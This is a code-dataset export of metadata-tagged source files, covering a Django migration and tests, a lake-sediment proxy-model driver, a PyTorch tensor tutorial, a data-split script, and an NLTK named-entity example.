| 16.545455 | 112 | 0.405983 | 173 | 1,638 | 3.843931 | 0.317919 | 0.115789 | 0.03609 | 0.066165 | 0.503759 | 0.485714 | 0.425564 | 0.353383 | 0.353383 | 0.294737 | 0 | 0.024606 | 0.379731 | 1,638 | 98 | 113 | 16.714286 | 0.629921 | 0.373626 | 0 | 0.736842 | 0 | 0 | 0.05235 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.394737 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
2842010b790379cb45ad0d302a5c0a5ff7f3616c | 431 | py | Python | api/migrations/0003_data_type.py | ajmaln/kerala-university-api | cdd685c627213d376444cdbfd7d57cbb41999b66 | [
"MIT"
] | null | null | null | api/migrations/0003_data_type.py | ajmaln/kerala-university-api | cdd685c627213d376444cdbfd7d57cbb41999b66 | [
"MIT"
] | 9 | 2020-02-11T23:16:35.000Z | 2021-09-08T00:12:21.000Z | api/migrations/0003_data_type.py | ajmaln/kerala-university-api | cdd685c627213d376444cdbfd7d57cbb41999b66 | [
"MIT"
] | null | null | null | # Generated by Django 2.1.1 on 2018-09-07 04:44
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated migration: add a `type` column to the `data` model."""

    dependencies = [
        ('api', '0002_auto_20180906_1708'),
    ]

    operations = [
        migrations.AddField(
            model_name='data',
            name='type',
            # Existing rows are back-filled with 'results'; preserve_default=False
            # means the default is dropped from the field definition afterwards.
            field=models.CharField(default='results', max_length=20),
            preserve_default=False,
        ),
    ]
| 21.55 | 69 | 0.593968 | 47 | 431 | 5.319149 | 0.829787 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.107843 | 0.290023 | 431 | 19 | 70 | 22.684211 | 0.70915 | 0.104408 | 0 | 0 | 1 | 0 | 0.106771 | 0.059896 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.076923 | 0 | 0.307692 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
284a7d4016babf6192b135533c9d0b672b2937ca | 10,364 | py | Python | psm/lake/lake_driver.py | amoodie/PRYSM | 99cf02145e3df0aad8b4d9103ab6c081d97bff1f | [
"MIT"
] | 21 | 2015-07-20T21:37:14.000Z | 2022-02-14T04:10:11.000Z | psm/lake/lake_driver.py | amoodie/PRYSM | 99cf02145e3df0aad8b4d9103ab6c081d97bff1f | [
"MIT"
] | 8 | 2015-10-08T16:37:04.000Z | 2019-01-04T21:02:09.000Z | psm/lake/lake_driver.py | amoodie/PRYSM | 99cf02145e3df0aad8b4d9103ab6c081d97bff1f | [
"MIT"
] | 13 | 2015-01-30T10:05:14.000Z | 2022-02-05T21:56:21.000Z | #======================================================================
# Sylvia Dee
# Modified 03/08/16 <sylvia_dee@brown.edu>
# Modified 04/02/18 <sylvia@ig.utexas.edu>
# Script to run lake sediment proxy system model
#======================================================================
# PRYSM v2.0 Lake Sediments, DRIVER SCRIPT
# Notes: please see all function docstrings for proper use.
# Dependencies: rpy2, f2py, numpy
"""
Lake PSM ~ Load Environmental Variables to compute lake energy/water balance.
This is a driver script. It is set up to walk the user through the necessary
commands to use the lake PSM. The user can load there own data in the fields below,
or use the provided test data.
This driver script calls the submodels:
lake_sensor
lake_archive
lake_obs
The final output is a pseudoproxy time series at a given site, with 1000
plausible chronologies, age-depth information, and related sensor uncertaities.
"""
#======================================================================
# L0. Initialization
#======================================================================
import numpy as np
import matplotlib.pyplot as plt
import matplotlib
from math import pi, sqrt, exp
#==============================================================
# L1. ENVIRONMENT SUB-MODEL: Load environment Input data
#==============================================================
# cd /disk/staff/sylvia/LAKEPSM/
# # Example data directory
# datadir='test_data_lake/'
# print 'Loading data from ', datadir,' ...'
# env_input='example_input.txt'
#==============================================================
# F2PY to run environment model: run the following in the command window
# NOTE:
# (1) IT RUNS IN THE COMMAND LINE NOT IN THE PYTHON SHELL.
# (2) Make sure to run and install in the correct environment.
# f2py -c -m lakepsm lake_environment.f90
# MUST BE IN SAME DIRECTORY AS COMPILED FORTRAN WRAPPER
# F2Py-compiled Fortran lake energy/water-balance model; build it first with
# `f2py -c -m lakepsm lake_environment.f90` in this directory.
import lakepsm

# NOTE(review): the original referenced `env_input` without ever defining it
# (the example assignment above is commented out), which raises NameError at
# run time. Fall back to the documented example file unless the user has
# already bound `env_input` themselves.
try:
    env_input
except NameError:
    env_input = 'example_input.txt'
# Kept for reference; the Fortran model locates its input internally.
lake_data_file = env_input

# Run Environment Model (Fortran, via the F2Py wrapper). Output files
# (profile_output.dat, surface_output.dat) appear in the working directory.
lakepsm.lakemodel()
# The above should run the fortran model through a wrapper (F2Py)
# The output files (listed below) should now appear in your working directory.
# output files:
#profile_output.dat
#surface_output.dat
#==============================================================
# L2. SENSOR MODEL(S)
#==============================================================
import sensor_gdgt as gdgt
import sensor_carbonate as carb
import sensor_leafwax as leafwax

# ---- Load forcing data for the sensor models -----------------------------
# Lake surface temperature simulated by the environment model above.
surf_output = 'ERA-HIST-Tlake_surf.dat'  # fixed local typo: was `surf_ouput`
surf_tempr = []
with open(surf_output, 'r') as data:
    tempr_yr = []
    for line in data:
        # column 1 holds the lake surface temperature for this time step
        tempr_yr.append(line.split()[1])
    # keep rows 341..-11 (strip leading spin-up and trailing records)
    surf_tempr.append(tempr_yr[341:-11])
# NOTE(review): the offset 275.15 looks like a typo for the standard
# Celsius->Kelvin offset 273.15 - confirm with the data producer before
# changing, since it alters every downstream proxy value.
surf_tempr = np.array(surf_tempr[0], dtype=float) + 275.15

# Reanalysis air-temperature climatology (values taken from column 2).
climate_input = 'ERA_INTERIM_climatology_Tanganyika.txt'
air_tempr = []
with open(climate_input, 'r') as data:
    airtemp_yr = []
    for line in data:
        airtemp_yr.append(line.split()[2])
    # drop the final 12 rows (one year of months)
    air_tempr.append(airtemp_yr[:-12])
air_tempr = np.array(air_tempr[0], dtype=float)

LST = surf_tempr   # full time series of lake surface temperature
MAAT = air_tempr   # full time series of air temperature
beta = 1. / 50.
d18Ow = -2         # used only when isoflag is off; to be set by the user

print('Running sensor model...')

# 2.1 GDGT Sensor
gdgt_proxy = gdgt.gdgt_sensor(LST, MAAT, beta=beta, model='MBT')
np.save('gdgt_sensor.npy', gdgt_proxy)

# 2.2 Carbonate Sensor
carb_proxy = carb.carb_sensor(LST, d18Ow, isoflag=-1, model='ONeil')
np.save('carb_sensor.npy', carb_proxy)

# 2.3 Leaf Wax Sensor
sample_input = 'IsoGSM_dDP_1953_2012.txt'
dDp = np.loadtxt(sample_input)
fC_3 = 0.7        # fraction of C3 plants
fC_4 = 0.3        # fraction of C4 plants
eps_c3 = -112.8   # apparent fractionation for C3, +/- 34.7
eps_c4 = -124.5   # apparent fractionation for C4, +/- 28.2
wax_proxy = leafwax.wax_sensor(dDp, fC_3, fC_4, eps_c3, eps_c4)

# Error range on the epsilon (apparent fractionation) measurements:
eps_c3_err = 34.7
eps_c4_err = 28.2
# Propagate fractionation uncertainty via Monte-Carlo resampling; Q1/Q2 are
# the 2.5th and 97.5th percentiles of the 1000 realizations.
delta_d_wax_mc, Q1, Q2 = leafwax.wax_uncertainty(dDp, fC_3, fC_4, eps_c3,
                                                 eps_c4, eps_c3_err, eps_c4_err)

# SAVE IN CURRENT DIRECTORY
np.save('leafwax_sensor.npy', wax_proxy)
np.save('leafwax_sensor_1000mc.npy', delta_d_wax_mc)
np.save('leafwax_sensor_975CI.npy', Q2)
# FIX: the filename and array were fused into one string in the original
# (np.save('leafwax_sensor_25CI.npy,Q1')), which raised TypeError and never
# saved the lower confidence bound.
np.save('leafwax_sensor_25CI.npy', Q1)

print('Sensor model finished....')
#==============================================================
# L4. RUN ARCHIVE MODEL
#==============================================================
import lake_archive_compact as compact
print 'Running archive model...'
# 4.1 SEDIMENTATION
Sbar = 100.0 # Sedimentation rate, cm/kyr
S = Sbar/1000. # Sedimentation rate, cm/yr
# Without compaction:
T = 21000. #years !set from the envriomental model!
H = S*T #meters (total accumulated thickness = rate * duration)
# TODO: NOTE THAT IF YOU HAVE DEPTH MEASUREMENTS THIS SHOULD BE SPECIFIED HERE
depth_profile = H # total depth of core [m]
h=np.linspace(0,H,num=100) # uncompacted depth grid: 100 evenly spaced levels
# NOTE(review): duplicate of the assignment two lines above; harmless but
# one of the two should probably be removed.
depth_profile=H # total depth of core
# Trends in porosity ~ reflect inhomogeneities in relatve compaction:
# Apply correction based on conservation of dry sediment volume wherein the thickness of each layer
# is adjusted so as to remove trends in porosity.
# Run porosity function to calculate compaction due to porosity in
# lake sediments:
phi,z = compact.porosity(depth_profile)
phi_0 = 0.95 # porosity of sediments at site (typical value for lake seds = 0.99)
np.save('phi.npy', phi)
np.save('z.npy',z)
# Now adjust the compacted sediment depth scale based on porosity
h_prime = np.zeros(len(phi)) # depth and age at each index.
for i in range(len(phi)):
    # conservation of dry sediment volume: layer thickness scales by (1-phi)
    h_prime[i] = h[i]*(1-phi_0)/(1-phi[i])
# save depth-age profile as independent output
#==============================================================
# 4.2 BIOTURBATION ~ TURBO2 (Trauth, 2013)
import lake_archive_bioturb as bio
years = np.arange(1979,2015,1) # READ THE YEARS.
age = years
mxl = np.ones(36)*4.
abu = np.ones(36)*200. # abundance of species carrier 1
# NOTE(review): abu[-37:-1] yields 35 of the 36 elements (the -37 start is
# clipped to 0 and the last element is dropped) - confirm whether abu[:]
# was intended.
abu2 = abu[-37:-1]
# NOTE(review): `pseudoproxy` is never defined anywhere in this driver; it
# must be bound by the user (e.g. to one of the sensor outputs above)
# before this section runs, otherwise this line raises NameError.
iso = pseudoproxy
lngth = len(pseudoproxy)
numb = 10
oriabu,bioabu,oriiso,bioiso = bio.bioturbation(abu2,iso,mxl,numb)
#==========================================================================
# L5. APPLY OBSERVATION MODEL
#==========================================================================
print 'Running observation model...'
import csv
from numpy import genfromtxt
from rpy2.robjects import FloatVector
from rpy2.robjects.vectors import StrVector
import rpy2.robjects as robjects
from rpy2.robjects.packages import importr
# require rpy2 installed
import lake_obs_bchron2 as bchron
# Age-depth control points read from CSV (named columns AGE, DP, SD).
data = genfromtxt('TEX86_cal.csv',
                  delimiter = ',',
                  names=True,
                  dtype=None
                  #mask module may be used when better understood
                  #,usemask=True
                  )
# example input file: user has to provide their own input
year=data['AGE'] # age control points
depth=data['DP'] # position of each control point in the core
sds=data['SD'] # uncertainty on each age
r = robjects.r # handle to the embedded R interpreter
# presumably one calibration-curve name per control point (26) - confirm
# against the input table's row count
calCurves=np.repeat('normal', 26)
nyears=21000. # NOTE(review): should be set from the input, not hard-coded
d=500. # same as H in the sedimentation section
ages = FloatVector(year) # age estimate
sd = FloatVector(sds)# SD of ages
positions = FloatVector(depth) # position in core in cm
calCurves = StrVector(calCurves)
predictPositions = r.seq(0,d,by=d/nyears) # note d= total depth of core (60cm)
# Specify extractDate (top-most age of the core, in years BP. 1950=0BP)
extractDate= -55
# Call BCHRON observation model to return CHRONS (in years BP)
# NOTE: long run time warning
chronBP, depth_horizons = bchron.chron(ages,sd,positions,calCurves,predictPositions,extractDate)
# recast in years CE
chronCE = np.fliplr(1950 - chronBP)
#==========================================================================
# 3.2: Analytical Uncertainty Model:
print 'Adding uncertainty...'
#Enter final simulated record (choose from above options)
# NOTE(review): `pseudoproxy` is never defined in this driver - bind it to
# one of the sensor outputs (e.g. carb_proxy or wax_proxy) first, or this
# line raises NameError.
X=pseudoproxy
#X=d18O_wm2
#3.2.1 Simple Model: just add uncertainty bands based on measurement precision
sigma=0.1 # permil, measurement precision
# NOTE(review): analytical_err_simple / analytical_error are neither defined
# nor imported in this script; they must come from a PRYSM utility module.
lake_upper, lake_lower = analytical_err_simple(X,sigma)
#3.2.2 Gaussian Noise Model for analytical error:
sigma=0.1
#nsamples = ## enter number of samples here
lake_Xn=analytical_error(X,sigma)
#====================================================================
# Save whatever needs to be saved
print 'Saving data...'
outdir='./results/'
np.save(outdir+"lake_Xn.npy",lake_Xn)
#Whatever else...
#====================================================================
# ~
# ~
# ~
# ~
#======================================================================
# L7 PLOTTING EXAMPLES
#======================================================================
# Plotting! Uncomment to plot compaction profile
# plt.style.use('ggplot')
# fig2 = plt.figure(1)
# fig2.add_subplot(1,2,1)
# plt.plot(z,phi,'b')
# plt.xlabel(r'Depth (m)',fontsize=16)
# plt.ylabel(r'Porosity Profile ($\phi$) (unitless)',fontsize=16)
# plt.title(r'Porosity ($\phi$) Profile in Sediment Core',fontsize=16)
# plt.grid('on',color='grey')
# plt.tick_params(axis='both', which='major', labelsize=14)
# plt.xticks(fontname = "Helvetica") # This argument will change the font.
# plt.yticks(fontname = "Helvetica") # This argument will change the font.
# #======================================================================
# fig2.add_subplot(1,2,2)
# plt.plot(z,h_prime,'r',label=r'Compacted Layer')
# plt.plot(z,h,'b',label=r'Non-Compacted Original Layer')
# plt.xlabel(r'Depth (m)',fontsize=16)
# plt.ylabel(r'Sediment Height (m)',fontsize=16)
# plt.title(r'Depth Scale w/Compaction in Sediment Core',fontsize=16)
# plt.grid('on',color='grey')
# plt.tick_params(axis='both', which='major', labelsize=14)
# plt.xticks(fontname = "Helvetica") # This argument will change the font.
# plt.yticks(fontname = "Helvetica") # This argument will change the font.
# plt.legend(loc=2)
# plt.show()
# # ======================================================================
| 30.662722 | 99 | 0.623311 | 1,407 | 10,364 | 4.503198 | 0.357498 | 0.008523 | 0.012311 | 0.011995 | 0.122633 | 0.111585 | 0.098327 | 0.089173 | 0.089173 | 0.072601 | 0 | 0.030868 | 0.146662 | 10,364 | 337 | 100 | 30.753709 | 0.68555 | 0.573041 | 0 | 0.069565 | 0 | 0 | 0.111171 | 0.043069 | 0 | 0 | 0 | 0.002967 | 0 | 0 | null | null | 0 | 0.147826 | null | null | 0.052174 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
284c3be764ab685f75f4fd753408ac9d359e9431 | 1,578 | py | Python | spin_tensor.py | gicheonkang/pyTorch-101 | c22c97295127aed18575b2a2586f3d3b74195b22 | [
"MIT"
] | 2 | 2018-03-27T13:39:51.000Z | 2018-04-01T01:28:25.000Z | spin_tensor.py | gicheonkang/pyTorch-101 | c22c97295127aed18575b2a2586f3d3b74195b22 | [
"MIT"
] | null | null | null | spin_tensor.py | gicheonkang/pyTorch-101 | c22c97295127aed18575b2a2586f3d3b74195b22 | [
"MIT"
] | null | null | null | import torch
from torch.autograd import Variable
batch_size = 100
row_lenth = 10
col_length = 10
if __name__ == '__main__':
a = Variable(torch.randn((batch_size, row_lenth, col_length)))
b = Variable(torch.randn((batch_size, row_lenth, col_length)))
c = Variable(torch.randn((batch_size, row_lenth, col_length)))
sum = Variable(torch.zeros((batch_size, row_lenth, col_length)))
#for i in range(batch_size):
# sum[i, :, :] = a[i, :, :] + b[i, :, :]
# 1. addition
#d = torch.add(a, 1, b)
#e = torch.add(a, b)
# 2. tensor multiplication
#d = torch.zeros((batch_size, row_lenth, col_length))
#for i in range(batch_size):
# d[i, :, :] = torch.mm(a[i, :, :], b[i, :, :])
#e = torch.matmul(a, b)
#if torch.eq(d, e).sum() == 10000:
# print('true')
# 3. element-wise multiplication
#d = torch.FloatTensor([[1, 2], [3, 4]])
#e = torch.FloatTensor([[1, 2], [3, 4]])
#print(torch.addcmul(torch.zeros((2, 2)), value=1, tensor1=d, tensor2=e))
#print(d * e)
# 4. outer-product (vector, vector)
#d = torch.LongTensor([1, 2, 3, 4, 5]).unsqueeze(0)
#e = torch.mm(torch.t(d), d)
#print(e)
# 5. outer-product (matrix, matrix)
#t = (batch_size, row_lenth, row_lenth)
#d = torch.randn((batch_size, row_lenth))
#e = torch.randn((batch_size, row_lenth))
#f = d.unsqueeze(-1).expand(*t) * e.unsqueeze(-2).expand(*t) # (100, 10, 10)
#print(f.size())
#g = torch.randn((batch_size, row_lenth, row_lenth))
#for i in range(batch_size):
# g[i, :, :] = torch.mm(d[i, :].unsqueeze(1), e[i, :].unsqueeze(0))
#print(torch.eq(f, g).sum())
| 20.230769 | 77 | 0.614702 | 258 | 1,578 | 3.608527 | 0.236434 | 0.125671 | 0.116004 | 0.164339 | 0.44898 | 0.44898 | 0.262084 | 0.262084 | 0.262084 | 0.120301 | 0 | 0.036585 | 0.168568 | 1,578 | 77 | 78 | 20.493506 | 0.673018 | 0.673638 | 0 | 0 | 0 | 0 | 0.016598 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.2 | 0 | 0.2 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
285230a0d94b2eacdd02d29202ba9a8da6a7a8f6 | 1,374 | py | Python | app/core/tests/test_models.py | dumrich/profiles-rest-api | 9e9690f05c6ac2c9d3e1a43ae38715f841e1332d | [
"MIT"
] | null | null | null | app/core/tests/test_models.py | dumrich/profiles-rest-api | 9e9690f05c6ac2c9d3e1a43ae38715f841e1332d | [
"MIT"
] | null | null | null | app/core/tests/test_models.py | dumrich/profiles-rest-api | 9e9690f05c6ac2c9d3e1a43ae38715f841e1332d | [
"MIT"
] | 1 | 2020-02-09T13:35:01.000Z | 2020-02-09T13:35:01.000Z | from django.test import TestCase
from django.contrib.auth import get_user_model
from unittest.mock import patch
from core import models
class ModelTests(TestCase):
    """Tests for the custom user model helpers."""

    def test_create_user_with_email(self):
        """A user can be created with an email address and password."""
        email = "abhinavchavali12@gmail.com"
        password = "Abhinav!23"
        created = get_user_model().objects.create_user(email=email, password=password)
        self.assertEqual(created.email, email)
        self.assertTrue(created.check_password(password))

    def test_normalize_email(self):
        """Email addresses are normalized on user creation."""
        email = "abhinavchavali34@GmAiL.cOm"
        created = get_user_model().objects.create_user(email=email, password='URAGAY')
        self.assertEqual(created.email, email.lower())

    def test_user_invalid_email(self):
        """Creating a user without an email raises ValueError."""
        password = "Abhinav!23"
        with self.assertRaises(ValueError):
            get_user_model().objects.create_user(None, password)

    def test_create_new_super_user(self):
        """Superusers are flagged as both superuser and staff."""
        email = "abhinavchavali12@gmail.com"
        password = "Abhinav!23"
        admin = get_user_model().objects.create_superuser(email=email, password=password)
        self.assertTrue(admin.is_superuser)
        self.assertTrue(admin.is_staff)
| 31.953488 | 88 | 0.665939 | 162 | 1,374 | 5.462963 | 0.283951 | 0.079096 | 0.067797 | 0.085876 | 0.39322 | 0.284746 | 0.251977 | 0.251977 | 0.251977 | 0.251977 | 0 | 0.01131 | 0.227802 | 1,374 | 42 | 89 | 32.714286 | 0.822809 | 0.080058 | 0 | 0.178571 | 0 | 0 | 0.092084 | 0.063005 | 0 | 0 | 0 | 0 | 0.214286 | 1 | 0.142857 | false | 0.285714 | 0.142857 | 0 | 0.321429 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
285b8306e6f7f7a7eee878f8da6045d61f504466 | 2,001 | py | Python | src/data_split.py | futu-munich-racing/neural-network-trainer | 9ab73a691fe09e853955abf72a6b7559e2711a10 | [
"MIT"
] | null | null | null | src/data_split.py | futu-munich-racing/neural-network-trainer | 9ab73a691fe09e853955abf72a6b7559e2711a10 | [
"MIT"
] | 4 | 2020-11-13T18:37:11.000Z | 2022-02-10T01:24:26.000Z | src/data_split.py | futu-munich-racing/neural-network-trainer | 9ab73a691fe09e853955abf72a6b7559e2711a10 | [
"MIT"
] | null | null | null | import sys
import argparse
import logging
from utils import fileio
from utils import model_selection
def parse_input_arguments(argv):
    """Parse command-line arguments for the data splitter.

    Args:
        argv: full argument vector in ``sys.argv`` style (the first entry is
            the program name and is ignored).

    Returns:
        argparse.Namespace with train/val/test fractions normalized to sum
        to one (so e.g. 70/15/15 behaves like 0.70/0.15/0.15).

    Raises:
        ValueError: if the requested split fractions do not sum to a
            positive value.
    """
    parser = argparse.ArgumentParser()
    parser.add_argument("-inputdir", type=str)
    parser.add_argument("-outputdir", type=str)
    parser.add_argument("-tub-dir-prefix", type=str, default="")
    parser.add_argument("-train-split", type=float, default=0.7)
    parser.add_argument("-val-split", type=float, default=0.15)
    parser.add_argument("-test-split", type=float, default=0.15)
    # Fix: the original called parser.parse_args() with no arguments, so the
    # `argv` parameter was silently ignored and the function always read
    # sys.argv, making it untestable. Callers pass the full sys.argv, hence
    # the [1:] slice to drop the program name.
    args = parser.parse_args(argv[1:])

    # Normalize train/val/test split in case they don't sum up to one.
    split_sum = args.train_split + args.val_split + args.test_split
    if split_sum <= 0:
        # Fix: previously this fell through to a ZeroDivisionError.
        raise ValueError("train/val/test split fractions must sum to a positive value")
    args.train_split /= split_sum
    args.val_split /= split_sum
    args.test_split /= split_sum

    return args
def main(argv):
    """Entry point: read records, split them, and copy them to the output dir."""
    logger = logging.getLogger("DataSplitter")
    logger.setLevel(logging.INFO)

    logger.info("Parsing input arguments")
    args = parse_input_arguments(argv)

    logger.info("Reading input records")
    records = fileio.process_donkey_data_dir(
        inputdir=args.inputdir, tub_dir_prefix=args.tub_dir_prefix
    )

    logger.info("Splitting data into train/val/test-sets")
    split = model_selection.train_val_test_split_session_records(
        records, args.train_split, args.val_split, args.test_split
    )
    train_records, val_records, test_records = split

    logger.info("Copying train/val/test data to output")
    fileio.move_train_split_files(
        args.inputdir, args.outputdir, train_records, val_records, test_records
    )


if __name__ == "__main__":
    main(sys.argv)
| 31.265625 | 91 | 0.705147 | 282 | 2,001 | 4.808511 | 0.386525 | 0.039823 | 0.075221 | 0.04646 | 0.193215 | 0.141593 | 0.057522 | 0.057522 | 0.057522 | 0 | 0 | 0.009346 | 0.197901 | 2,001 | 63 | 92 | 31.761905 | 0.835514 | 0.184408 | 0 | 0 | 0 | 0 | 0.127542 | 0 | 0 | 0 | 0 | 0.015873 | 0 | 1 | 0.047619 | false | 0 | 0.119048 | 0 | 0.190476 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
2860a01a6d4593f37b00c7b81f2e7066467831fd | 3,258 | py | Python | tests/integration/test_database/test_model/test_file_type.py | refitt/ref | 3ccc398e7b95f77549ab77884b87f40abdd3effb | [
"Apache-2.0"
] | 4 | 2020-09-11T01:15:11.000Z | 2021-05-12T16:46:48.000Z | tests/integration/test_database/test_model/test_file_type.py | refitt/ref | 3ccc398e7b95f77549ab77884b87f40abdd3effb | [
"Apache-2.0"
] | 12 | 2021-03-20T03:24:53.000Z | 2022-02-19T03:20:43.000Z | tests/integration/test_database/test_model/test_file_type.py | refitt/ref | 3ccc398e7b95f77549ab77884b87f40abdd3effb | [
"Apache-2.0"
] | 2 | 2021-02-01T23:49:39.000Z | 2021-12-11T19:01:23.000Z | # SPDX-FileCopyrightText: 2019-2021 REFITT Team
# SPDX-License-Identifier: Apache-2.0
"""Database file_type model integration tests."""
# external libs
import pytest
from sqlalchemy.exc import IntegrityError
# internal libs
from refitt.database.model import FileType, NotFound
from tests.integration.test_database.test_model.conftest import TestData
from tests.integration.test_database.test_model import json_roundtrip
class TestFileType:
    """Integration tests for the `FileType` database model."""

    def test_init(self, testdata: TestData) -> None:
        """Create file_type instance and validate accessors."""
        for record in testdata['file_type']:
            instance = FileType(**record)
            assert all(getattr(instance, field) == expected
                       for field, expected in record.items())

    def test_dict(self, testdata: TestData) -> None:
        """Test round-trip of dict translations."""
        for record in testdata['file_type']:
            assert FileType.from_dict(record).to_dict() == record

    def test_tuple(self, testdata: TestData) -> None:
        """Test tuple-conversion."""
        for record in testdata['file_type']:
            instance = FileType.from_dict(record)
            assert instance.to_tuple() == tuple(record.values())

    def test_embedded_no_join(self, testdata: TestData) -> None:
        """Tests embedded method to check JSON-serialization."""
        for record in testdata['file_type']:
            serialized = json_roundtrip(FileType(**record).to_json(join=False))
            assert serialized == record

    def test_embedded(self) -> None:
        """Test embedded method to check JSON-serialization and auto-join."""
        expected = {
            'id': 1,
            'name': 'fits.gz',
            'description': 'Gzip compressed FITS file.'
        }
        assert FileType.from_name('fits.gz').to_json(join=True) == expected

    def test_from_id(self, testdata: TestData) -> None:
        """Test loading file_type from `id`."""
        # NOTE: `id` not set until after insert
        for position, record in enumerate(testdata['file_type'], start=1):
            assert FileType.from_id(position).name == record['name']

    def test_id_missing(self) -> None:
        """Test exception on missing file_type `id`."""
        with pytest.raises(NotFound):
            FileType.from_id(-1)

    def test_id_already_exists(self) -> None:
        """Test exception on file_type `id` already exists."""
        duplicate = {'id': 1, 'name': 'jpeg',
                     'description': 'A bad format for scientific images.'}
        with pytest.raises(IntegrityError):
            FileType.add(duplicate)

    def test_from_name(self, testdata: TestData) -> None:
        """Test loading file_type from `name`."""
        for record in testdata['file_type']:
            name = record['name']
            assert FileType.from_name(name).name == name

    def test_name_missing(self) -> None:
        """Test exception on missing file_type `name`."""
        with pytest.raises(NotFound):
            FileType.from_name('png')

    def test_name_already_exists(self) -> None:
        """Test exception on file_type `name` already exists."""
        duplicate = {'name': 'fits.gz',
                     'description': 'Gzip compressed FITS file.'}
        with pytest.raises(IntegrityError):
            FileType.add(duplicate)
| 38.785714 | 80 | 0.630141 | 397 | 3,258 | 5.025189 | 0.259446 | 0.080201 | 0.06015 | 0.07218 | 0.528321 | 0.475188 | 0.354386 | 0.313283 | 0.21604 | 0.059148 | 0 | 0.005689 | 0.244629 | 3,258 | 83 | 81 | 39.253012 | 0.804957 | 0.218232 | 0 | 0.208333 | 0 | 0 | 0.092854 | 0 | 0 | 0 | 0 | 0 | 0.145833 | 1 | 0.229167 | false | 0 | 0.104167 | 0 | 0.354167 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
28632dbedf679eac46f903ab0ddbd2badd934f93 | 338 | py | Python | NLP programmes in Python/5. Information Extraction/NP chunking (NER)/NP chunking (NER).py | AlexandrosPlessias/NLP-Greek-Presentations | 4ae9d635a777f24bae5238b9f195bd17d00040ea | [
"MIT"
] | null | null | null | NLP programmes in Python/5. Information Extraction/NP chunking (NER)/NP chunking (NER).py | AlexandrosPlessias/NLP-Greek-Presentations | 4ae9d635a777f24bae5238b9f195bd17d00040ea | [
"MIT"
] | null | null | null | NLP programmes in Python/5. Information Extraction/NP chunking (NER)/NP chunking (NER).py | AlexandrosPlessias/NLP-Greek-Presentations | 4ae9d635a777f24bae5238b9f195bd17d00040ea | [
"MIT"
] | null | null | null | # NP chunking (NER)
# NP chunking (NER) demo: sentence-split, tokenize, POS-tag, then run
# NLTK's named-entity chunker over a sample text file.
import nltk

# BUG FIX: the original opened the file without ever closing it;
# `with` guarantees the handle is released even on error.
with open("sample.txt") as f:
    text = f.read()

# Split the raw text into sentences, then tokenize and POS-tag each one.
sentences = nltk.sent_tokenize(text)
tokenized_sentences = [nltk.word_tokenize(sentence) for sentence in sentences]
tagged_sentences = [nltk.pos_tag(sentence) for sentence in tokenized_sentences]

# Print the NE-chunked tree for every tagged sentence.
for sent in tagged_sentences:
    print(nltk.ne_chunk(sent))
| 28.166667 | 80 | 0.754438 | 48 | 338 | 5.145833 | 0.520833 | 0.157895 | 0.153846 | 0.17004 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.142012 | 338 | 11 | 81 | 30.727273 | 0.851724 | 0.050296 | 0 | 0 | 0 | 0 | 0.032468 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.125 | 0 | 0.125 | 0.125 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
2863a9572564b39e20759ab0a630c2aff85e9e7e | 1,811 | py | Python | gesund_projekt/pomodoros/views.py | asis2016/gesund-projekt | cb3828b69cd6a86deeab16943e38b6ebffd86abb | [
"MIT"
] | null | null | null | gesund_projekt/pomodoros/views.py | asis2016/gesund-projekt | cb3828b69cd6a86deeab16943e38b6ebffd86abb | [
"MIT"
